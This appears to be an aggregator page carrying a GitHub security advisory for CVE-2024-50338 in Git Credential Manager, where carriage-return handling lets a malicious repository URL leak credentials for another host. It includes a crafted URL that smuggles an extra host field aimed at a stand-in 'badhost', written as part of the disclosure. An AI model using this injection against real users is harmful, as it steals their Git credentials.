Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS04NmMyLTR4NTctd2M4Z84ABDXE

Git Credential Manager carriage-return character in remote URL allows malicious repository to leak credentials

Description

The Git credential protocol is text-based over standard input/output, and consists of a series of lines of key-value pairs in the format key=value. Git's documentation restricts the use of the NUL (\0) character and newlines to form part of the keys[^1] or values.

When Git reads from standard input, it considers both LF and CRLF[^2] as newline characters for the credential protocol by virtue of calling strbuf_getline that calls to strbuf_getdelim_strip_crlf. Git also validates that a newline is not present in the value by checking for the presence of the line-feed character (LF, \n), and errors if this is the case. This captures both LF and CRLF-type newlines.

Git Credential Manager uses the .NET standard library StreamReader class to read the standard input stream line-by-line and parse the key=value credential protocol format. The implementation of the ReadLineAsync method considers LF, CRLF, and CR as valid line endings. This is means that .NET considers a single CR as a valid newline character, whereas Git does not.

This mismatch of newline treatment between Git and GCM means that an attacker can craft a malicious remote URL such as:

https://\rhost=targethost@badhost

..which will be interpreted by Git as:

protocol=https
host=badhost
username=\rhost=targethost

This will instead be parsed by GCM as if the following has been passed by Git:

protocol=https
host=badhost
username=
host=targethost

This results in the host field being resolved to the targethost value. GCM will then return a credential for targethost to Git, which will then send this credential to the badhost host.

Impact

When a user clones or otherwise interacts[^3] with a malicious repository that requires authentication, the attacker can capture credentials for another Git remote. The attack is also heightened when cloning from repositories with submodules when using the --recursive clone option as the user is not able to inspect the submodule remote URLs beforehand.

Patches

https://github.com/git-ecosystem/git-credential-manager/compare/749e287571c78a2b61f926ccce6a707050871ab8...99e2f7f60e7364fe807e7925f361a81f3c47bd1b

Workarounds

Only interacting with trusted remote repositories, and do not clone with --recursive to allow inspection of any submodule URLs before cloning those submodules.

Fixed versions

This issue is fixed as of version 2.6.1.

[^1]: The = character is also forbidden to form part of the key.
[^2]: Carriage-return character (CR, \r), followed by a line-feed character.
[^3]: Any remote operation such as fetch, ls-remote, etc.

Permalink: https://github.com/advisories/GHSA-86c2-4x57-wc8g
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NmMyLTR4NTctd2M4Z84ABDXE
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 3 days ago
Updated: 3 days ago


CVSS Score: 7.4
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

EPSS Percentage: 0.00044
EPSS Percentile: 0.15063

Identifiers: GHSA-86c2-4x57-wc8g, CVE-2024-50338
References: Repository: https://github.com/git-ecosystem/git-credential-manager
Blast Radius: 0.0

Affected Packages

nuget:git-credential-manager
Dependent packages: 1
Dependent repositories: 1
Downloads: 615,436 total
Affected Version Ranges: <= 2.6.0
Fixed in: 2.6.1
All affected versions: 0.1.0, 2.0.866, 2.0.877, 2.0.886, 2.0.931, 2.0.935, 2.1.0, 2.1.1, 2.1.2, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.1, 2.5.1, 2.6.0
All unaffected versions: 2.6.1